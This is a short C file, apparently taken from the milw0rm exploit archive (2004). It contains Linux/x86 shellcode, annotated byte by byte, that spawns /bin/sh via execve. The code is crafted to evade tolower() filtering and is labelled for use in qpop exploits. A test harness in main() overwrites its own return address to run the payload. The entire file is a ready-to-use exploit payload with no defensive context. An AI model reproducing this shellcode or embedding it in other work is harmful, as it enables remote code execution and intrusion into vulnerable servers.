/*
* Linux/x86
* tolower() evasion, execve() /bin/sh
* (eg use: various qpop exploits)
*/
#include <stdio.h>
char c0de[] =
/* main: */
"\xeb\x1b" /* jmp callz */
/* start: */
"\x5e" /* popl %esi */
"\x89\xf3" /* movl %esi, %ebx */
"\x89\xf7" /* movl %esi, %edi */
"\x83\xc7\x07" /* addl $0x07, %edi */
"\x29\xc0" /* subl %eax, %eax */
"\xaa" /* stosb %al, %es:(%edi) */
"\x89\xf9" /* movl %edi, %ecx */
"\x89\xf0" /* movl %esi, %eax */
"\xab" /* stosl %eax, %es:(%edi) */
"\x89\xfa" /* movl %edi, %edx */
"\x29\xc0" /* subl %eax, %eax */
"\xab" /* stosl %eax, %es:(%edi) */
"\xb0\x08" /* movb $0x08, %al */
"\x04\x03" /* addb $0x03, %al */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\xe0\xff\xff\xff" /* call start */
/* DATA */
"/bin/sh";
main() {
int *ret;
ret=(int *)&ret +2;
printf("Shellcode lenght=%d\n",strlen(c0de));
(*ret) = (int)c0de;
}
// milw0rm.com [2004-09-12]